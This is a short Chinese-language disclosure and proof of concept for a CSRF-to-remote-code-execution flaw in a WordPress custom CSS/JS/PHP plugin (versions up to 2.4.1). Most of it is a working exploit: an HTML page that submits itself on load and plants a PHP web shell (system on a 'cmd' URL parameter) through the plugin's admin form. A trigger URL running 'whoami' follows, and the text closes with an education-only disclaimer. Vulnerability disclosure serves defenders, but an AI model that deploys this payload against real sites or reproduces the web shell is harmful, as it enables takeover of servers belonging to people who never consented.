WPFactory Custom CSS, JS & PHP 插件中存在一个跨站请求伪造 (CSRF) 漏洞,允许通过未授权的 POST 请求注入恶意 PHP 代码,从而实现远程代码执行 (RCE)。
此漏洞影响所有版本 2.4.1 及以下。
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H以下截图展示了成功利用的结果,演示了如何通过 URL 参数执行远程代码:


<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability</title>
</head>
<body onload="document.forms[0].submit()">
<h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1</h1>
<p>By : Nxploited | Khaled Alenazi</p>
<form action="http://192.168.100.74:888/wordpress4/wp-admin/tools.php?page=alg-custom-php" method="POST">
<input type="hidden" name="alg_custom_css_php_enabled" value="1">
<input type="hidden" name="alg_custom_css_php_execute" value="plugins_loaded">
<input type="hidden" name="alg_custom_css_php" value="<?php system($_GET['cmd']); ?>">
<input type="hidden" name="alg_ccjp_submit" value="php">
<noscript><input type="submit" value="Submit"></noscript>
</form>
</body>
</html>
plugins_loaded 钩子在每次页面加载时自动执行。http://target-site.com/?cmd=whoami
此 PoC 仅用于教育目的。
作者对不当使用此信息所造成的任何滥用或损害概不负责。
请始终在受控环境中并获得授权后再进行测试。
作者: Nxploited | Khaled Alenazi